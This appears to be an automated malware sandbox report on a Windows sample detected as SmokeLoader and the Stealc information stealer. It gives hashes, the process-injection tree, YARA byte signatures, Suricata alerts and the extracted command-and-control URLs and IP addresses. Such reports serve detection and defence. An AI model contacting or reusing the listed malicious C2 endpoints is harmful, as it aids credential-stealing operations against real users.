Edit tour

Windows Analysis Report
e0OOofAl0S.exe

Overview

General Information

Sample name:	e0OOofAl0S.exe renamed because original name is a hash value
Original sample name:	bdaeb131caed57083370b0c24ed030eb.exe
Analysis ID:	1502849
MD5:	bdaeb131caed57083370b0c24ed030eb
SHA1:	c4a00fc122d2015d41c0cf38e00a4711ae05d66d
SHA256:	0923186058b76b52069af9fd282af6c98766179cbdd524e4d941e0bf44802781
Tags:	exeStealc
Infos:

Detection

CryptOne, SmokeLoader, Stealc

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Benign windows process drops PE files

Detected unpacking (changes PE section rights)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

System process connects to network (likely due to code injection or exploit)

Yara detected CryptOne packer

Yara detected Powershell download and execute

Yara detected SmokeLoader

Yara detected Stealc

AI detected suspicious sample

Allocates memory in foreign processes

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Contains functionality to inject code into remote processes

Creates a thread in another existing process (thread injection)

Deletes itself after installation

Hides that the sample has been downloaded from the Internet (zone.identifier)

Injects a PE file into a foreign processes

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sample uses process hollowing technique

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Writes to foreign memory regions

Abnormal high CPU Usage

Checks if the current process is being debugged

Contains functionality to call native functions

Contains functionality to read the PEB

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops files with a non-matching file extension (content does not match file extension)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sigma detected: Execution of Suspicious File Type Extension

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Keylogger Generic

Yara signature match

Classification

Process Tree

System is w10x64

e0OOofAl0S.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\e0OOofAl0S.exe" MD5: BDAEB131CAED57083370B0C24ED030EB)

explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)

D931.exe (PID: 7888 cmdline: C:\Users\user\AppData\Local\Temp\D931.exe MD5: 17D51083CCB2B20074B1DC2CAC5BEA36)

svchost015.exe (PID: 7940 cmdline: C:\Users\user\AppData\Local\Temp\svchost015.exe MD5: B826DD92D78EA2526E465A34324EBEEA)

busaafd (PID: 7708 cmdline: C:\Users\user\AppData\Roaming\busaafd MD5: BDAEB131CAED57083370B0C24ED030EB)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
SmokeLoader	The SmokeLoader family is a generic backdoor with a range of capabilities which depend on the modules included in any given build of the malware. The malware is delivered in a variety of ways and is broadly associated with criminal activity. The malware frequently tries to hide its C2 activity by generating requests to legitimate sites such as microsoft.com, bing.com, adobe.com, and others. Typically the actual Download returns an HTTP 404 but still contains data in the Response Body.	SMOKY SPIDER	http://security.neurolabs.club/2019/08/smokeloaders-hardcoded-domains-sneaky.html http://security.neurolabs.club/2019/10/dynamic-imports-and-working-around.html http://security.neurolabs.club/2020/04/diffing-malware-samples-using-bindiff.html http://security.neurolabs.club/2020/06/unpacking-smokeloader-and.html https://0xc0decafe.com/2020/12/23/detect-rc4-in-malicious-binaries	https://malpedia.caad.fkie.fraunhofer.de/details/win.smokeloader

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://91.202.233.158/e96ea2db21fa9a1b.php", "Botnet": "default"}

Threatname: SmokeLoader

{"Version": 2022, "C2 list": ["http://epohe.ru/tmp/", "http://olihonols.in.net/tmp/", "http://nicetolosv.xyz/tmp/", "http://jftolsa.ws/tmp/"]}

Yara Signatures

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
C:\Users\user\AppData\Local\Temp\svchost015.exe	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000005.00000002.2068943563.00000000007A4000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3898:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2068827308.0000000000701000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1778845801.00000000004A0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000000.00000002.1778980791.0000000000534000.00000040.00000020.00020000.00000000.sdmp	Windows_Trojan_RedLineStealer_ed346e4c	unknown	unknown	0x3380:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000007.00000002.2308518677.00000000030A9000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Crypt	Yara detected CryptOne packer	Joe Security
00000008.00000002.2317202796.0000000000CB0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1779063535.00000000007F1000.00000004.10000000.00040000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x214:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000005.00000002.2068728315.00000000005D0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_SmokeLoader_2	Yara detected SmokeLoader	Joe Security
00000000.00000002.1778862518.00000000004B0000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_4e31426e	unknown	unknown	0x614:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
00000005.00000002.2068696078.00000000005B0000.00000040.00001000.00020000.00000000.sdmp	Windows_Trojan_Smokeloader_3687686f	unknown	unknown	0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
00000007.00000002.2308518677.0000000002DA0000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
00000008.00000000.2305216322.0000000000401000.00000020.00000001.01000000.00000007.sdmp	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security
Process Memory Space: D931.exe PID: 7888	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: D931.exe PID: 7888	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 7940	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
Process Memory Space: svchost015.exe PID: 7940	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 16 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.svchost015.exe.400000.0.unpack	JoeSecurity_Keylogger_Generic	Yara detected Keylogger Generic	Joe Security
8.0.svchost015.exe.400000.0.unpack	JoeSecurity_DelphiSystemParamCount	Detected Delphi use of System.ParamCount()	Joe Security

Sigma Signatures

System Summary

Sigma detected: Execution of Suspicious File Type Extension

Source: Process started

Author: Max Altgelt (Nextron Systems): Data: Command: C:\Users\user\AppData\Roaming\busaafd, CommandLine: C:\Users\user\AppData\Roaming\busaafd, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\busaafd, NewProcessName: C:\Users\user\AppData\Roaming\busaafd, OriginalFileName: C:\Users\user\AppData\Roaming\busaafd, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Users\user\AppData\Roaming\busaafd, ProcessId: 7708, ProcessName: busaafd

Suricata Signatures

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:46.144858+0200
SID:	2039103
Severity:	1
Source Port:	49755
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:06.074213+0200
SID:	2039103
Severity:	1
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:06.074213+0200
SID:	2851815
Severity:	1
Source Port:	49769
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:35.566947+0200
SID:	2039103
Severity:	1
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:35.566947+0200
SID:	2851815
Severity:	1
Source Port:	49785
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:51.699971+0200
SID:	2039103
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:51.699971+0200
SID:	2851815
Severity:	1
Source Port:	49761
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:36.818718+0200
SID:	2039103
Severity:	1
Source Port:	49745
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:57.436085+0200
SID:	2039103
Severity:	1
Source Port:	49765
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:46.246051+0200
SID:	2039103
Severity:	1
Source Port:	49787
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:49.853566+0200
SID:	2039103
Severity:	1
Source Port:	49759
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:41.739107+0200
SID:	2039103
Severity:	1
Source Port:	49776
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:44.307397+0200
SID:	2039103
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:44.307397+0200
SID:	2851815
Severity:	1
Source Port:	49753
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:40.627412+0200
SID:	2039103
Severity:	1
Source Port:	49749
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:53.089075+0200
SID:	2039103
Severity:	1
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:53.089075+0200
SID:	2851815
Severity:	1
Source Port:	49778
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:35.445479+0200
SID:	2039103
Severity:	1
Source Port:	49775
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:43.396127+0200
SID:	2039103
Severity:	1
Source Port:	49752
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:20.269684+0200
SID:	2039103
Severity:	1
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:20.269684+0200
SID:	2851815
Severity:	1
Source Port:	49782
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:33.077567+0200
SID:	2039103
Severity:	1
Source Port:	49741
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:34.012823+0200
SID:	2039103
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:34.012823+0200
SID:	2851815
Severity:	1
Source Port:	49742
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:23.938544+0200
SID:	2039103
Severity:	1
Source Port:	49773
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:47.094815+0200
SID:	2039103
Severity:	1
Source Port:	49756
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile - Source IP: 192.168.2.4 - Destination IP: 191.96.144.157

Timestamp:	2024-09-02T11:42:52.757802+0200
SID:	2019714
Severity:	2
Source Port:	49763
Destination Port:	443
Protocol:	TCP
Classtype:	Potentially Bad Traffic

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:30.435855+0200
SID:	2039103
Severity:	1
Source Port:	49784
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:58.475161+0200
SID:	2039103
Severity:	1
Source Port:	49766
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:07.581354+0200
SID:	2039103
Severity:	1
Source Port:	49770
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:51.472671+0200
SID:	2039103
Severity:	1
Source Port:	49788
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:14.633022+0200
SID:	2039103
Severity:	1
Source Port:	49781
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:40.635665+0200
SID:	2039103
Severity:	1
Source Port:	49786
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:29.123326+0200
SID:	2039103
Severity:	1
Source Port:	49737
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:03.508358+0200
SID:	2039103
Severity:	1
Source Port:	49779
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:34.926361+0200
SID:	2039103
Severity:	1
Source Port:	49743
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:25.102743+0200
SID:	2039103
Severity:	1
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:25.102743+0200
SID:	2851815
Severity:	1
Source Port:	49783
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:39.714288+0200
SID:	2039103
Severity:	1
Source Port:	49748
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:32.133054+0200
SID:	2039103
Severity:	1
Source Port:	49740
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:30.974304+0200
SID:	2039103
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:30.974304+0200
SID:	2851815
Severity:	1
Source Port:	49739
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:12.999244+0200
SID:	2039103
Severity:	1
Source Port:	49771
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:57.213860+0200
SID:	2039103
Severity:	1
Source Port:	49789
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:29.746264+0200
SID:	2039103
Severity:	1
Source Port:	49774
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:04.318219+0200
SID:	2039103
Severity:	1
Source Port:	49768
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:37.745024+0200
SID:	2039103
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:37.745024+0200
SID:	2851815
Severity:	1
Source Port:	49746
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:48.937036+0200
SID:	2039103
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:48.937036+0200
SID:	2851815
Severity:	1
Source Port:	49758
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:50.783382+0200
SID:	2039103
Severity:	1
Source Port:	49760
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:35.855465+0200
SID:	2039103
Severity:	1
Source Port:	49744
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:45.220522+0200
SID:	2039103
Severity:	1
Source Port:	49754
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:30.050148+0200
SID:	2039103
Severity:	1
Source Port:	49738
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:38.679783+0200
SID:	2039103
Severity:	1
Source Port:	49747
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:47.294091+0200
SID:	2039103
Severity:	1
Source Port:	49777
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:48.003225+0200
SID:	2039103
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ETPRO MALWARE Sharik/Smokeloader CnC Beacon 18 - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:48.003225+0200
SID:	2851815
Severity:	1
Source Port:	49757
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in - Source IP: 192.168.2.4 - Destination IP: 91.202.233.158

Timestamp:	2024-09-02T11:43:01.253746+0200
SID:	2044243
Severity:	1
Source Port:	49767
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:41.556561+0200
SID:	2039103
Severity:	1
Source Port:	49750
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:56.442991+0200
SID:	2039103
Severity:	1
Source Port:	49764
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:42:42.462385+0200
SID:	2039103
Severity:	1
Source Port:	49751
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:45:09.261012+0200
SID:	2039103
Severity:	1
Source Port:	49780
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

ET MALWARE Suspected Smokeloader Activity (POST) - Source IP: 192.168.2.4 - Destination IP: 102.189.104.201

Timestamp:	2024-09-02T11:44:18.565696+0200
SID:	2039103
Severity:	1
Source Port:	49772
Destination Port:	80
Protocol:	TCP
Classtype:	A Network Trojan was detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://91.202.233.158/	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/W	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.php	Avira URL Cloud: Label: malware
Source: http://91.202.233.158	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpB	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/ws	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpg	Avira URL Cloud: Label: malware
Source: http://91.202.233.158/e96ea2db21fa9a1b.phpm	Avira URL Cloud: Label: malware

Found malware configuration

